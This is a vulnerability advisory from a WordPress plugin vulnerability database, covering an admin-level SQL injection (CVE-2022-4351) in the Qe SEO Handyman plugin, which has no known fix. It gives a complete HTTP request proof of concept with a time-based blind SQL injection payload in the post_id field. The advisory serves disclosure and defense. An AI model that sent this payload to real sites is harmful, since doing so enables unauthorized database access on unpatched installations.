WordPress Plugin Vulnerabilities

Qe SEO Handyman <= 1.0 - Admin+ SQLi

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Origin: http://localhost
Connection: close
Cookie: [admin+]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)

Affects Plugins

Plugin icon
qe-seo-handyman
No known fix

References

CVE
CVE-2022-4351
URL
https://bulletin.iese.de/post/qe-seo-handyman_1-0_1

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Verified
Yes
WPVDB ID
2138f736-8a50-4390-a239-fcd1d736670a

Timeline

Publicly Published
2022-12-08 (about 1 years ago)
Added
2022-12-08 (about 1 years ago)
Last Updated
2022-12-08 (about 1 years ago)

Other

Published
Title
Published
2015-07-08
Title
Pretty Link Lite <= 1.6.7 - Authenticated SQL Injection
Published
2016-06-06
Title
Double Opt-In for Download < 2.1.0 - Authenticated SQL Injection
Published
2021-07-15
Title
Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection
Published
2018-01-28
Title
User Control - Unauthenticated SQL Injection
Published
2016-02-25
Title
WP Ultimate Exporter <= 1.1 - Unauthenticated SQL Injection